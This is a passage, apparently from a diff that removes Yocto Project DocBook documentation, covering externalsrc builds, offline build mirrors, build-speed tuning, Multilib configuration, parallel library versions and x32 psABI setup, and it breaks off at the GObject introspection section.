- <ulink url='&YOCTO_DOCS_REF_URL;#var-SERIAL_CONSOLES'><filename>SERIAL_CONSOLES</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-XSERVER'><filename>XSERVER</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_FEATURES'><filename>MACHINE_FEATURES</filename></ulink>,
- and so forth in code that is supposed to only be
- tune-specific or when the recipe depends
- (<ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'><filename>RDEPENDS</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-RRECOMMENDS'><filename>RRECOMMENDS</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-RSUGGESTS'><filename>RSUGGESTS</filename></ulink>,
- and so forth) on some other recipe that already has
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_ARCH'><filename>PACKAGE_ARCH</filename></ulink>
- defined as "${MACHINE_ARCH}".
- <note>
- Patches to fix any issues identified are most welcome
- as these issues occasionally do occur.
- </note></para>
-
- <para>For such cases, you can use some tools to help you
- sort out the situation:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>sstate-diff-machines.sh</filename>:</emphasis>
- You can find this tool in the
- <filename>scripts</filename> directory of the
- Source Repositories.
- See the comments in the script for information on
- how to use the tool.
- </para></listitem>
- <listitem><para>
- <emphasis>BitBake's "-S printdiff" Option:</emphasis>
- Using this option causes BitBake to try to
- establish the closest signature match it can
- (e.g. in the shared state cache) and then run
- <filename>bitbake-diffsigs</filename> over the
- matches to determine the stamps and delta where
- these two stamp trees diverge.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id="building-software-from-an-external-source">
- <title>Building Software from an External Source</title>
-
- <para>
- By default, the OpenEmbedded build system uses the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- when building source code.
- The build process involves fetching the source files, unpacking
- them, and then patching them if necessary before the build takes
- place.
- </para>
-
- <para>
- Situations exist where you might want to build software from source
- files that are external to and thus outside of the
- OpenEmbedded build system.
- For example, suppose you have a project that includes a new BSP with
- a heavily customized kernel.
- And, you want to minimize exposing the build system to the
- development team so that they can focus on their project and
- maintain everyone's workflow as much as possible.
- In this case, you want a kernel source directory on the development
- machine where the development occurs.
- You want the recipe's
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- variable to point to the external directory and use it as is, not
- copy it.
- </para>
-
- <para>
- To build from software that comes from an external source, all you
- need to do is inherit the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-externalsrc'><filename>externalsrc</filename></ulink>
- class and then set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTERNALSRC'><filename>EXTERNALSRC</filename></ulink>
- variable to point to your external source code.
- Here are the statements to put in your
- <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- INHERIT += "externalsrc"
- EXTERNALSRC_pn-<replaceable>myrecipe</replaceable> = "<replaceable>path-to-your-source-tree</replaceable>"
- </literallayout>
- </para>
-
- <para>
- This next example shows how to accomplish the same thing by setting
- <filename>EXTERNALSRC</filename> in the recipe itself or in the
- recipe's append file:
- <literallayout class='monospaced'>
- EXTERNALSRC = "<replaceable>path</replaceable>"
- EXTERNALSRC_BUILD = "<replaceable>path</replaceable>"
- </literallayout>
- <note>
- In order for these settings to take effect, you must globally
- or locally inherit the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-externalsrc'><filename>externalsrc</filename></ulink>
- class.
- </note>
- </para>
-
- <para>
- By default, <filename>externalsrc.bbclass</filename> builds
- the source code in a directory separate from the external source
- directory as specified by
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTERNALSRC'><filename>EXTERNALSRC</filename></ulink>.
- If you need to have the source built in the same directory in
- which it resides, or some other nominated directory, you can set
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTERNALSRC_BUILD'><filename>EXTERNALSRC_BUILD</filename></ulink>
- to point to that directory:
- <literallayout class='monospaced'>
- EXTERNALSRC_BUILD_pn-<replaceable>myrecipe</replaceable> = "<replaceable>path-to-your-source-tree</replaceable>"
- </literallayout>
- </para>
- </section>
-
- <section id="replicating-a-build-offline">
- <title>Replicating a Build Offline</title>
-
- <para>
- It can be useful to take a "snapshot" of upstream sources
- used in a build and then use that "snapshot" later to
- replicate the build offline.
- To do so, you need to first prepare and populate your downloads
- directory your "snapshot" of files.
- Once your downloads directory is ready, you can use it at
- any time and from any machine to replicate your build.
- </para>
-
- <para>
- Follow these steps to populate your Downloads directory:
- <orderedlist>
- <listitem><para>
- <emphasis>Create a Clean Downloads Directory:</emphasis>
- Start with an empty downloads directory
- (<ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink>).
- You start with an empty downloads directory by either
- removing the files in the existing directory or by
- setting
- <filename>DL_DIR</filename> to point to either an
- empty location or one that does not yet exist.
- </para></listitem>
- <listitem><para>
- <emphasis>Generate Tarballs of the Source Git Repositories:</emphasis>
- Edit your <filename>local.conf</filename> configuration
- file as follows:
- <literallayout class='monospaced'>
- DL_DIR = "/home/<replaceable>your-download-dir</replaceable>/"
- BB_GENERATE_MIRROR_TARBALLS = "1"
- </literallayout>
- During the fetch process in the next step, BitBake
- gathers the source files and creates tarballs in
- the directory pointed to by <filename>DL_DIR</filename>.
- See the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BB_GENERATE_MIRROR_TARBALLS'><filename>BB_GENERATE_MIRROR_TARBALLS</filename></ulink>
- variable for more information.
- </para></listitem>
- <listitem><para>
- <emphasis>Populate Your Downloads Directory Without Building:</emphasis>
- Use BitBake to fetch your sources but inhibit the
- build:
- <literallayout class='monospaced'>
- $ bitbake <replaceable>target</replaceable> --runonly=fetch
- </literallayout>
- The downloads directory (i.e.
- <filename>${DL_DIR}</filename>) now has a "snapshot" of
- the source files in the form of tarballs, which can
- be used for the build.
- </para></listitem>
- <listitem><para>
- <emphasis>Optionally Remove Any Git or other SCM Subdirectories From the Downloads Directory:</emphasis>
- If you want, you can clean up your downloads directory
- by removing any Git or other Source Control Management
- (SCM) subdirectories such as
- <filename>${DL_DIR}/git2/*</filename>.
- The tarballs already contain these subdirectories.
- </para></listitem>
- </orderedlist>
- </para>
-
- <para>
- Once your downloads directory has everything it needs regarding
- source files, you can create your "own-mirror" and build
- your target.
- Understand that you can use the files to build the target
- offline from any machine and at any time.
- </para>
-
- <para>
- Follow these steps to build your target using the files in the
- downloads directory:
- <orderedlist>
- <listitem><para>
- <emphasis>Using Local Files Only:</emphasis>
- Inside your <filename>local.conf</filename> file, add
- the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SOURCE_MIRROR_URL'><filename>SOURCE_MIRROR_URL</filename></ulink>
- variable,
- inherit the <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-own-mirrors'><filename>own-mirrors</filename></ulink>
- class, and use the
- <ulink url='&YOCTO_DOCS_BB_URL;#var-bb-BB_NO_NETWORK'><filename>BB_NO_NETWORK</filename></ulink>
- variable to your <filename>local.conf</filename>.
- <literallayout class='monospaced'>
- SOURCE_MIRROR_URL ?= "file:///home/<replaceable>your-download-dir</replaceable>/"
- INHERIT += "own-mirrors"
- BB_NO_NETWORK = "1"
- </literallayout>
- The <filename>SOURCE_MIRROR_URL</filename> and
- <filename>own-mirror</filename> class set up the system
- to use the downloads directory as your "own mirror".
- Using the <filename>BB_NO_NETWORK</filename>
- variable makes sure that BitBake's fetching process
- in step 3 stays local, which means files from
- your "own-mirror" are used.
- </para></listitem>
- <listitem><para>
- <emphasis>Start With a Clean Build:</emphasis>
- You can start with a clean build by removing the
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink><filename>}</filename>
- directory or using a new
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- </para></listitem>
- <listitem><para>
- <emphasis>Build Your Target:</emphasis>
- Use BitBake to build your target:
- <literallayout class='monospaced'>
- $ bitbake <replaceable>target</replaceable>
- </literallayout>
- The build completes using the known local "snapshot" of
- source files from your mirror.
- The resulting tarballs for your "snapshot" of source
- files are in the downloads directory.
- <note>
- <para>The offline build does not work if recipes
- attempt to find the latest version of software
- by setting
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>
- to
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-AUTOREV'><filename>AUTOREV</filename></ulink><filename>}</filename>:
- <literallayout class='monospaced'>
- SRCREV = "${AUTOREV}"
- </literallayout>
- When a recipe sets
- <filename>SRCREV</filename> to
- <filename>${AUTOREV}</filename>, the build system
- accesses the network in an attempt to determine the
- latest version of software from the SCM.
- Typically, recipes that use
- <filename>AUTOREV</filename> are custom or
- modified recipes.
- Recipes that reside in public repositories
- usually do not use <filename>AUTOREV</filename>.
- </para>
-
- <para>If you do have recipes that use
- <filename>AUTOREV</filename>, you can take steps to
- still use the recipes in an offline build.
- Do the following:
- <orderedlist>
- <listitem><para>
- Use a configuration generated by
- enabling
- <link linkend='maintaining-build-output-quality'>build history</link>.
- </para></listitem>
- <listitem><para>
- Use the
- <filename>buildhistory-collect-srcrevs</filename>
- command to collect the stored
- <filename>SRCREV</filename> values from
- the build's history.
- For more information on collecting these
- values, see the
- "<link linkend='build-history-package-information'>Build History Package Information</link>"
- section.
- </para></listitem>
- <listitem><para>
- Once you have the correct source
- revisions, you can modify those recipes
- to to set <filename>SRCREV</filename>
- to specific versions of the software.
- </para></listitem>
- </orderedlist>
- </para>
- </note>
- </para></listitem>
- </orderedlist>
- </para>
- </section>
- </section>
-
- <section id='speeding-up-a-build'>
- <title>Speeding Up a Build</title>
-
- <para>
- Build time can be an issue.
- By default, the build system uses simple controls to try and maximize
- build efficiency.
- In general, the default settings for all the following variables
- result in the most efficient build times when dealing with single
- socket systems (i.e. a single CPU).
- If you have multiple CPUs, you might try increasing the default
- values to gain more speed.
- See the descriptions in the glossary for each variable for more
- information:
- <itemizedlist>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BB_NUMBER_THREADS'><filename>BB_NUMBER_THREADS</filename>:</ulink>
- The maximum number of threads BitBake simultaneously executes.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_BB_URL;#var-BB_NUMBER_PARSE_THREADS'><filename>BB_NUMBER_PARSE_THREADS</filename>:</ulink>
- The number of threads BitBake uses during parsing.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename>:</ulink>
- Extra options passed to the <filename>make</filename> command
- during the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-compile'><filename>do_compile</filename></ulink>
- task in order to specify parallel compilation on the
- local build host.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PARALLEL_MAKEINST'><filename>PARALLEL_MAKEINST</filename>:</ulink>
- Extra options passed to the <filename>make</filename> command
- during the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
- task in order to specify parallel installation on the
- local build host.
- </para></listitem>
- </itemizedlist>
- As mentioned, these variables all scale to the number of processor
- cores available on the build system.
- For single socket systems, this auto-scaling ensures that the build
- system fundamentally takes advantage of potential parallel operations
- during the build based on the build machine's capabilities.
- </para>
-
- <para>
- Following are additional factors that can affect build speed:
- <itemizedlist>
- <listitem><para>
- File system type:
- The file system type that the build is being performed on can
- also influence performance.
- Using <filename>ext4</filename> is recommended as compared
- to <filename>ext2</filename> and <filename>ext3</filename>
- due to <filename>ext4</filename> improved features
- such as extents.
- </para></listitem>
- <listitem><para>
- Disabling the updating of access time using
- <filename>noatime</filename>:
- The <filename>noatime</filename> mount option prevents the
- build system from updating file and directory access times.
- </para></listitem>
- <listitem><para>
- Setting a longer commit:
- Using the "commit=" mount option increases the interval
- in seconds between disk cache writes.
- Changing this interval from the five second default to
- something longer increases the risk of data loss but decreases
- the need to write to the disk, thus increasing the build
- performance.
- </para></listitem>
- <listitem><para>
- Choosing the packaging backend:
- Of the available packaging backends, IPK is the fastest.
- Additionally, selecting a singular packaging backend also
- helps.
- </para></listitem>
- <listitem><para>
- Using <filename>tmpfs</filename> for
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>
- as a temporary file system:
- While this can help speed up the build, the benefits are
- limited due to the compiler using
- <filename>-pipe</filename>.
- The build system goes to some lengths to avoid
- <filename>sync()</filename> calls into the
- file system on the principle that if there was a significant
- failure, the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- contents could easily be rebuilt.
- </para></listitem>
- <listitem><para>
- Inheriting the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-rm-work'><filename>rm_work</filename></ulink>
- class:
- Inheriting this class has shown to speed up builds due to
- significantly lower amounts of data stored in the data
- cache as well as on disk.
- Inheriting this class also makes cleanup of
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>
- faster, at the expense of being easily able to dive into the
- source code.
- File system maintainers have recommended that the fastest way
- to clean up large numbers of files is to reformat partitions
- rather than delete files due to the linear nature of
- partitions.
- This, of course, assumes you structure the disk partitions and
- file systems in a way that this is practical.
- </para></listitem>
- </itemizedlist>
- Aside from the previous list, you should keep some trade offs in
- mind that can help you speed up the build:
- <itemizedlist>
- <listitem><para>
- Remove items from
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></ulink>
- that you might not need.
- </para></listitem>
- <listitem><para>
- Exclude debug symbols and other debug information:
- If you do not need these symbols and other debug information,
- disabling the <filename>*-dbg</filename> package generation
- can speed up the build.
- You can disable this generation by setting the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-INHIBIT_PACKAGE_DEBUG_SPLIT'><filename>INHIBIT_PACKAGE_DEBUG_SPLIT</filename></ulink>
- variable to "1".
- </para></listitem>
- <listitem><para>
- Disable static library generation for recipes derived from
- <filename>autoconf</filename> or <filename>libtool</filename>:
- Following is an example showing how to disable static
- libraries and still provide an override to handle exceptions:
- <literallayout class='monospaced'>
- STATICLIBCONF = "--disable-static"
- STATICLIBCONF_sqlite3-native = ""
- EXTRA_OECONF += "${STATICLIBCONF}"
- </literallayout>
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- Some recipes need static libraries in order to work
- correctly (e.g. <filename>pseudo-native</filename>
- needs <filename>sqlite3-native</filename>).
- Overrides, as in the previous example, account for
- these kinds of exceptions.
- </para></listitem>
- <listitem><para>
- Some packages have packaging code that assumes the
- presence of the static libraries.
- If so, you might need to exclude them as well.
- </para></listitem>
- </itemizedlist>
- </note>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id="platdev-working-with-libraries">
- <title>Working With Libraries</title>
-
- <para>
- Libraries are an integral part of your system.
- This section describes some common practices you might find
- helpful when working with libraries to build your system:
- <itemizedlist>
- <listitem><para><link linkend='including-static-library-files'>How to include static library files</link>
- </para></listitem>
- <listitem><para><link linkend='combining-multiple-versions-library-files-into-one-image'>How to use the Multilib feature to combine multiple versions of library files into a single image</link>
- </para></listitem>
- <listitem><para><link linkend='installing-multiple-versions-of-the-same-library'>How to install multiple versions of the same library in parallel on the same system</link>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <section id='including-static-library-files'>
- <title>Including Static Library Files</title>
-
- <para>
- If you are building a library and the library offers static linking, you can control
- which static library files (<filename>*.a</filename> files) get included in the
- built library.
- </para>
-
- <para>
- The <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'><filename>PACKAGES</filename></ulink>
- and <ulink url='&YOCTO_DOCS_REF_URL;#var-FILES'><filename>FILES_*</filename></ulink>
- variables in the
- <filename>meta/conf/bitbake.conf</filename> configuration file define how files installed
- by the <filename>do_install</filename> task are packaged.
- By default, the <filename>PACKAGES</filename> variable includes
- <filename>${PN}-staticdev</filename>, which represents all static library files.
- <note>
- Some previously released versions of the Yocto Project
- defined the static library files through
- <filename>${PN}-dev</filename>.
- </note>
- Following is part of the BitBake configuration file, where
- you can see how the static library files are defined:
- <literallayout class='monospaced'>
- PACKAGE_BEFORE_PN ?= ""
- PACKAGES = "${PN}-dbg ${PN}-staticdev ${PN}-dev ${PN}-doc ${PN}-locale ${PACKAGE_BEFORE_PN} ${PN}"
- PACKAGES_DYNAMIC = "^${PN}-locale-.*"
- FILES = ""
-
- FILES_${PN} = "${bindir}/* ${sbindir}/* ${libexecdir}/* ${libdir}/lib*${SOLIBS} \
- ${sysconfdir} ${sharedstatedir} ${localstatedir} \
- ${base_bindir}/* ${base_sbindir}/* \
- ${base_libdir}/*${SOLIBS} \
- ${base_prefix}/lib/udev/rules.d ${prefix}/lib/udev/rules.d \
- ${datadir}/${BPN} ${libdir}/${BPN}/* \
- ${datadir}/pixmaps ${datadir}/applications \
- ${datadir}/idl ${datadir}/omf ${datadir}/sounds \
- ${libdir}/bonobo/servers"
-
- FILES_${PN}-bin = "${bindir}/* ${sbindir}/*"
-
- FILES_${PN}-doc = "${docdir} ${mandir} ${infodir} ${datadir}/gtk-doc \
- ${datadir}/gnome/help"
- SECTION_${PN}-doc = "doc"
-
- FILES_SOLIBSDEV ?= "${base_libdir}/lib*${SOLIBSDEV} ${libdir}/lib*${SOLIBSDEV}"
- FILES_${PN}-dev = "${includedir} ${FILES_SOLIBSDEV} ${libdir}/*.la \
- ${libdir}/*.o ${libdir}/pkgconfig ${datadir}/pkgconfig \
- ${datadir}/aclocal ${base_libdir}/*.o \
- ${libdir}/${BPN}/*.la ${base_libdir}/*.la"
- SECTION_${PN}-dev = "devel"
- ALLOW_EMPTY_${PN}-dev = "1"
- RDEPENDS_${PN}-dev = "${PN} (= ${EXTENDPKGV})"
-
- FILES_${PN}-staticdev = "${libdir}/*.a ${base_libdir}/*.a ${libdir}/${BPN}/*.a"
- SECTION_${PN}-staticdev = "devel"
- RDEPENDS_${PN}-staticdev = "${PN}-dev (= ${EXTENDPKGV})"
- </literallayout>
- </para>
- </section>
-
- <section id="combining-multiple-versions-library-files-into-one-image">
- <title>Combining Multiple Versions of Library Files into One Image</title>
-
- <para>
- The build system offers the ability to build libraries with different
- target optimizations or architecture formats and combine these together
- into one system image.
- You can link different binaries in the image
- against the different libraries as needed for specific use cases.
- This feature is called "Multilib."
- </para>
-
- <para>
- An example would be where you have most of a system compiled in 32-bit
- mode using 32-bit libraries, but you have something large, like a database
- engine, that needs to be a 64-bit application and uses 64-bit libraries.
- Multilib allows you to get the best of both 32-bit and 64-bit libraries.
- </para>
-
- <para>
- While the Multilib feature is most commonly used for 32 and 64-bit differences,
- the approach the build system uses facilitates different target optimizations.
- You could compile some binaries to use one set of libraries and other binaries
- to use a different set of libraries.
- The libraries could differ in architecture, compiler options, or other
- optimizations.
- </para>
-
- <para>
- Several examples exist in the
- <filename>meta-skeleton</filename> layer found in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>:
- <itemizedlist>
- <listitem><para><filename>conf/multilib-example.conf</filename>
- configuration file</para></listitem>
- <listitem><para><filename>conf/multilib-example2.conf</filename>
- configuration file</para></listitem>
- <listitem><para><filename>recipes-multilib/images/core-image-multilib-example.bb</filename>
- recipe</para></listitem>
- </itemizedlist>
- </para>
-
- <section id='preparing-to-use-multilib'>
- <title>Preparing to Use Multilib</title>
-
- <para>
- User-specific requirements drive the Multilib feature.
- Consequently, there is no one "out-of-the-box" configuration that likely
- exists to meet your needs.
- </para>
-
- <para>
- In order to enable Multilib, you first need to ensure your recipe is
- extended to support multiple libraries.
- Many standard recipes are already extended and support multiple libraries.
- You can check in the <filename>meta/conf/multilib.conf</filename>
- configuration file in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink> to see how this is
- done using the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBCLASSEXTEND'><filename>BBCLASSEXTEND</filename></ulink>
- variable.
- Eventually, all recipes will be covered and this list will
- not be needed.
- </para>
-
- <para>
- For the most part, the Multilib class extension works automatically to
- extend the package name from <filename>${PN}</filename> to
- <filename>${MLPREFIX}${PN}</filename>, where <filename>MLPREFIX</filename>
- is the particular multilib (e.g. "lib32-" or "lib64-").
- Standard variables such as
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'><filename>RDEPENDS</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-RPROVIDES'><filename>RPROVIDES</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-RRECOMMENDS'><filename>RRECOMMENDS</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'><filename>PACKAGES</filename></ulink>, and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES_DYNAMIC'><filename>PACKAGES_DYNAMIC</filename></ulink>
- are automatically extended by the system.
- If you are extending any manual code in the recipe, you can use the
- <filename>${MLPREFIX}</filename> variable to ensure those names are extended
- correctly.
- This automatic extension code resides in <filename>multilib.bbclass</filename>.
- </para>
- </section>
-
- <section id='using-multilib'>
- <title>Using Multilib</title>
-
- <para>
- After you have set up the recipes, you need to define the actual
- combination of multiple libraries you want to build.
- You accomplish this through your <filename>local.conf</filename>
- configuration file in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- An example configuration would be as follows:
- <literallayout class='monospaced'>
- MACHINE = "qemux86-64"
- require conf/multilib.conf
- MULTILIBS = "multilib:lib32"
- DEFAULTTUNE_virtclass-multilib-lib32 = "x86"
- IMAGE_INSTALL_append = " lib32-glib-2.0"
- </literallayout>
- This example enables an
- additional library named <filename>lib32</filename> alongside the
- normal target packages.
- When combining these "lib32" alternatives, the example uses "x86" for tuning.
- For information on this particular tuning, see
- <filename>meta/conf/machine/include/ia32/arch-ia32.inc</filename>.
- </para>
-
- <para>
- The example then includes <filename>lib32-glib-2.0</filename>
- in all the images, which illustrates one method of including a
- multiple library dependency.
- You can use a normal image build to include this dependency,
- for example:
- <literallayout class='monospaced'>
- $ bitbake core-image-sato
- </literallayout>
- You can also build Multilib packages specifically with a command like this:
- <literallayout class='monospaced'>
- $ bitbake lib32-glib-2.0
- </literallayout>
- </para>
- </section>
-
- <section id='additional-implementation-details'>
- <title>Additional Implementation Details</title>
-
- <para>
- Generic implementation details as well as details that are
- specific to package management systems exist.
- Following are implementation details that exist regardless
- of the package management system:
- <itemizedlist>
- <listitem><para>The typical convention used for the
- class extension code as used by
- Multilib assumes that all package names specified
- in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'><filename>PACKAGES</filename></ulink>
- that contain <filename>${PN}</filename> have
- <filename>${PN}</filename> at the start of the name.
- When that convention is not followed and
- <filename>${PN}</filename> appears at
- the middle or the end of a name, problems occur.
- </para></listitem>
- <listitem><para>The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TARGET_VENDOR'><filename>TARGET_VENDOR</filename></ulink>
- value under Multilib will be extended to
- "-<replaceable>vendor</replaceable>ml<replaceable>multilib</replaceable>"
- (e.g. "-pokymllib32" for a "lib32" Multilib with
- Poky).
- The reason for this slightly unwieldy contraction
- is that any "-" characters in the vendor
- string presently break Autoconf's
- <filename>config.sub</filename>, and
- other separators are problematic for different
- reasons.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- For the RPM Package Management System, the following implementation details
- exist:
- <itemizedlist>
- <listitem><para>A unique architecture is defined for the Multilib packages,
- along with creating a unique deploy folder under
- <filename>tmp/deploy/rpm</filename> in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- For example, consider <filename>lib32</filename> in a
- <filename>qemux86-64</filename> image.
- The possible architectures in the system are "all", "qemux86_64",
- "lib32_qemux86_64", and "lib32_x86".</para></listitem>
- <listitem><para>The <filename>${MLPREFIX}</filename> variable is stripped from
- <filename>${PN}</filename> during RPM packaging.
- The naming for a normal RPM package and a Multilib RPM package in a
- <filename>qemux86-64</filename> system resolves to something similar to
- <filename>bash-4.1-r2.x86_64.rpm</filename> and
- <filename>bash-4.1.r2.lib32_x86.rpm</filename>, respectively.
- </para></listitem>
- <listitem><para>When installing a Multilib image, the RPM backend first
- installs the base image and then installs the Multilib libraries.
- </para></listitem>
- <listitem><para>The build system relies on RPM to resolve the identical files in the
- two (or more) Multilib packages.</para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- For the IPK Package Management System, the following implementation details exist:
- <itemizedlist>
- <listitem><para>The <filename>${MLPREFIX}</filename> is not stripped from
- <filename>${PN}</filename> during IPK packaging.
- The naming for a normal RPM package and a Multilib IPK package in a
- <filename>qemux86-64</filename> system resolves to something like
- <filename>bash_4.1-r2.x86_64.ipk</filename> and
- <filename>lib32-bash_4.1-rw_x86.ipk</filename>, respectively.
- </para></listitem>
- <listitem><para>The IPK deploy folder is not modified with
- <filename>${MLPREFIX}</filename> because packages with and without
- the Multilib feature can exist in the same folder due to the
- <filename>${PN}</filename> differences.</para></listitem>
- <listitem><para>IPK defines a sanity check for Multilib installation
- using certain rules for file comparison, overridden, etc.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
- </section>
-
- <section id='installing-multiple-versions-of-the-same-library'>
- <title>Installing Multiple Versions of the Same Library</title>
-
- <para>
- Situations can exist where you need to install and use
- multiple versions of the same library on the same system
- at the same time.
- These situations almost always exist when a library API
- changes and you have multiple pieces of software that
- depend on the separate versions of the library.
- To accommodate these situations, you can install multiple
- versions of the same library in parallel on the same system.
- </para>
-
- <para>
- The process is straightforward as long as the libraries use
- proper versioning.
- With properly versioned libraries, all you need to do to
- individually specify the libraries is create separate,
- appropriately named recipes where the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink> part of the
- name includes a portion that differentiates each library version
- (e.g.the major part of the version number).
- Thus, instead of having a single recipe that loads one version
- of a library (e.g. <filename>clutter</filename>), you provide
- multiple recipes that result in different versions
- of the libraries you want.
- As an example, the following two recipes would allow the
- two separate versions of the <filename>clutter</filename>
- library to co-exist on the same system:
- <literallayout class='monospaced'>
- clutter-1.6_1.6.20.bb
- clutter-1.8_1.8.4.bb
- </literallayout>
- Additionally, if you have other recipes that depend on a given
- library, you need to use the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
- variable to create the dependency.
- Continuing with the same example, if you want to have a recipe
- depend on the 1.8 version of the <filename>clutter</filename>
- library, use the following in your recipe:
- <literallayout class='monospaced'>
- DEPENDS = "clutter-1.8"
- </literallayout>
- </para>
- </section>
- </section>
-
- <section id='using-x32-psabi'>
- <title>Using x32 psABI</title>
-
- <para>
- x32 processor-specific Application Binary Interface
- (<ulink url='https://software.intel.com/en-us/node/628948'>x32 psABI</ulink>)
- is a native 32-bit processor-specific ABI for
- <trademark class='registered'>Intel</trademark> 64 (x86-64)
- architectures.
- An ABI defines the calling conventions between functions in a
- processing environment.
- The interface determines what registers are used and what the
- sizes are for various C data types.
- </para>
-
- <para>
- Some processing environments prefer using 32-bit applications even
- when running on Intel 64-bit platforms.
- Consider the i386 psABI, which is a very old 32-bit ABI for Intel
- 64-bit platforms.
- The i386 psABI does not provide efficient use and access of the
- Intel 64-bit processor resources, leaving the system underutilized.
- Now consider the x86_64 psABI.
- This ABI is newer and uses 64-bits for data sizes and program
- pointers.
- The extra bits increase the footprint size of the programs,
- libraries, and also increases the memory and file system size
- requirements.
- Executing under the x32 psABI enables user programs to utilize CPU
- and system resources more efficiently while keeping the memory
- footprint of the applications low.
- Extra bits are used for registers but not for addressing mechanisms.
- </para>
-
- <para>
- The Yocto Project supports the final specifications of x32 psABI
- as follows:
- <itemizedlist>
- <listitem><para>
- You can create packages and images in x32 psABI format on
- x86_64 architecture targets.
- </para></listitem>
- <listitem><para>
- You can successfully build recipes with the x32 toolchain.
- </para></listitem>
- <listitem><para>
- You can create and boot
- <filename>core-image-minimal</filename> and
- <filename>core-image-sato</filename> images.
- </para></listitem>
- <listitem><para>
- RPM Package Manager (RPM) support exists for x32 binaries.
- </para></listitem>
- <listitem><para>
- Support for large images exists.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- To use the x32 psABI, you need to edit your
- <filename>conf/local.conf</filename> configuration file as
- follows:
- <literallayout class='monospaced'>
- MACHINE = "qemux86-64"
- DEFAULTTUNE = "x86-64-x32"
- baselib = "${@d.getVar('BASE_LIB_tune-' + (d.getVar('DEFAULTTUNE') \
- or 'INVALID')) or 'lib'}"
- </literallayout>
- Once you have set up your configuration file, use BitBake to
- build an image that supports the x32 psABI.
- Here is an example:
- <literallayout class='monospaced'>
- $ bitbake core-image-sato
- </literallayout>
- </para>
- </section>
-
- <section id='enabling-gobject-introspection-support'>
- <title>Enabling GObject Introspection Support</title>
-
- <para>
- <ulink url='https://wiki.gnome.org/Projects/GObjectIntrospection'>GObject introspection</ulink>
- is the standard mechanism for accessing GObject-based software
- from runtime environments.
- GObject is a feature of the GLib library that provides an object
- framework for the GNOME desktop and related software.
- GObject Introspection adds information to GObject that allows
- objects created within it to be represented across different
- programming languages.
- If you want to construct GStreamer pipelines using Python, or
- control UPnP infrastructure using Javascript and GUPnP,
